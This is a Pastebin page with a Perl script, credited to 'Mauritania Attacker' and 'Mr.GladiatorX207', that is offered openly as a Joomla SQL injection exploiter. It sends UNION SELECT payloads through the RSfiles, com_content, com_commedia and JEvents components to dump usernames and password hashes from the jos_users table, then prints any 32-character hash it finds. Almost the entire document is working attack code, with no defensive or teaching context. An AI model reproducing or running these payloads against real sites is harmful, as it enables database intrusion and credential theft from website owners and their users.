API tools faq
paste
Advertisement
KilledSecurity

joomla SQLi Exploiter v.1 By Mr.GladiatorX207

KilledSecurity
Oct 23rd, 2014
279
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 4.47 KB | None | 0 0
raw download clone embed print report
  1.  
  2.     #!/usr/bin/perl
  3.     use IO::Socket::INET;
  4.     use LWP::UserAgent;
  5.     system("clear");
  6.     print "------------------------------------------------------------------------\n";
  7.     print "########################################################################\n";
  8.     print "#                         Joomla SQli 1.0 Exploiter                    #\n";
  9.     print "#                      *Coded By Mauritania Attacker*                  #\n";
  10.     print "#                       *Modifed By Mr.GladiatorX207*                  #\n";
  11.     print "########################################################################\n";
  12.     print "------------------------------------------------------------------------\n\n";
  13.     $target = $ARGV[0];
  14.     $component = $ARGV[1];
  15.     if($target eq '' || $component eq '')
  16.     {
  17.     print "Usage: ./exploit.pl <target> <Method Number> \n";
  18.     print "-----------------------------------\n";
  19.     print " Available Exploits :              \n";
  20.     print " 1- Joomla Component RSfiles       \n";
  21.     print " 2- Joomla General Sql Injection   \n";
  22.     print " 3- Joomla Component JEvents       \n";
  23.     print "-----------------------------------\n";
  24.     print " Example: ./exploit.pl http://www.site.com/ 1 \n\n";
  25.     exit(1);
  26.     }
  27.      
  28.     open(FILE, "> contents11.txt");
  29.      
  30.     if($target !~ /http:\/\//)
  31.     {
  32.     $target = "http://$target";
  33.     }
  34.      
  35.     sleep 1.5;
  36.     $agent = LWP::UserAgent->new();
  37.     $agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1');
  38.      
  39.      
  40.     if($component == 1)
  41.     {
  42.     $host = $target . "/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--";
  43.     print " . . Exploiting Component RSfiles on target $target . . \n\n";
  44.     sleep 1;
  45.     $req = $agent->request(HTTP::Request->new(GET=>$host));
  46.     $content = $req->content;
  47.     if($content =~ /([0-9a-fA-F]{32})/)
  48.     {
  49.     $password = $1;
  50.     print "[+] Password found --> $password :) .\n\n";
  51.     sleep 1;
  52.     }
  53.     else
  54.     {
  55.     print "[-] Password not found :( . \n\n";
  56.     }
  57.     }
  58.      
  59.      
  60.      
  61.      
  62.      
  63.      
  64.      
  65.      
  66.     if($component == 2)
  67.      
  68.     {
  69.     print " . . Exploiting General Sql Injection on target $target . . \n\n";
  70.     sleep 1;
  71.     print " . . Trying different types of injection for this component . . wait please . . \n\n";
  72.     $host = $target . "/index.php?option=com_content&amp;task=blogcategory&amp;id=60&amp;Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/*";
  73.     $host1 = $target . "/index.php?option=com_commedia&format=raw&task=down&pid=59&id=999999.9 union all select (select concat(0x3c757365723e, username,0x3c757365723e3c706173733e,count(*),password,0x3c706173733e) from jos_users),null--";
  74.      
  75.      
  76.      
  77.     @hosts = ($host,$host1);
  78.     foreach $hos(@hosts)
  79.     {
  80.     sleep 1;
  81.     $req = $agent->request(HTTP::Request->new(GET=>$hos));
  82.     $content = $req->content;
  83.     if($content =~ /([0-9a-fA-F]{32})/)
  84.     {
  85.     $password = $1;
  86.     print "Password found --> $password :) . \n\n";
  87.     sleep 1;
  88.     }
  89.     else
  90.     {
  91.     print "Password not found :( . \n\n";
  92.     sleep 1;
  93.     }
  94.     }
  95.     }
  96.      
  97.      
  98.      
  99.      
  100.      
  101.      
  102.      
  103.      
  104.      
  105.      
  106.     if($component == 3)
  107.      
  108.     {
  109.     print " . . Exploiting Component JEvents on target $target . . \n\n";
  110.     sleep 1;
  111.     print " . . Trying different types of injection for this component . . wait please . . \n\n";
  112.     $host = $target . "/index.php?option=com_events&task=view_detail&year=union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--";
  113.     $host1 = $target . "/index.php?option=com_events&task=view_year&Itemid=50&year=union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--";
  114.     $host2 = $target . "/index.php?option=com_events&Itemid=34&task=view_year&month=11&year=union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10 from jos_users--";
  115.      
  116.      
  117.     @hosts = ($host,$host1,$host2);
  118.     foreach $hos(@hosts)
  119.     {
  120.     sleep 1;
  121.     $req = $agent->request(HTTP::Request->new(GET=>$hos));
  122.     $content = $req->content;
  123.     if($content =~ /([0-9a-fA-F]{32})/)
  124.     {
  125.     $password = $1;
  126.     print "Password found --> $password :) . \n\n";
  127.     sleep 1;
  128.     }
  129.     else
  130.     {
  131.     print "Password not found :( . \n\n";
  132.     sleep 1;
  133.     }
  134.     }
  135.     }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!